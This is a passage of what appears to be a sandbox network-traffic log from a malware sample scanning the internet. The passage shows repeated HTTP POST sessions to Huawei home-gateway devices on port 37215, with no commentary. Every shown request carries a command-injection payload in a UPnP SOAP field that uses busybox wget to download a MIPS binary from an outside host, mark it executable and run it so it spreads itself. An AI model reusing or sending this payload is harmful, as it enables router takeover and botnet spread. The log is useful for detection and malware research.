                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          645192.168.2.1558586132.1.223.237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.611170053 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          646192.168.2.153337441.50.226.7837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.611223936 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          647192.168.2.156087241.140.119.1137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.611258030 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          648192.168.2.1540384197.170.82.20137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.611310005 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          649192.168.2.1552832197.49.36.12537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.611428022 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          650192.168.2.1550308157.92.193.23437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.611445904 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          651192.168.2.1557270197.54.132.21937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.611464977 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          652192.168.2.153541062.28.43.14437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.611490965 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          653192.168.2.1550514157.236.51.23737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.611502886 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          654192.168.2.1560100157.13.9.15537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:51.611524105 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
